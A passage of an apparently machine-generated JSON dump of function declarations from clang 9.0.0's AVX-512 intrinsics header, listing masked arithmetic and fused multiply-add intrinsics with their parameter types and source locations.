"storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_add_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1897:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_add_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1921:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_add_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1927:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_mask_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1950:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1957:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1964:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1971:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_mask_sub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2006:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_sub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2012:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_sub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2035:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_sub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2041:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_mask_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2065:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2072:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2079:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2086:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_mask_mul_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2121:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_mul_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_mul_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_mul_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2156:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_mask_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2180:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2187:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2194:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2201:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_mask_div_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2236:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_div_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2242:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_div_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2266:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_div_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2272:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2296:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2302:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2309:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2316:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2322:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2329:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2512:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2522:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask3_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2542:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2552:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2562:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2572:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2582:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask3_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2592:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2602:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2612:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2622:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2716:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2726:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask3_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2736:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2746:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2756:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2766:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2776:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2786:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask3_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2796:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2806:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2816:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2826:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2885:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2895:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask3_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2905:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2915:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2925:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:2935:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": 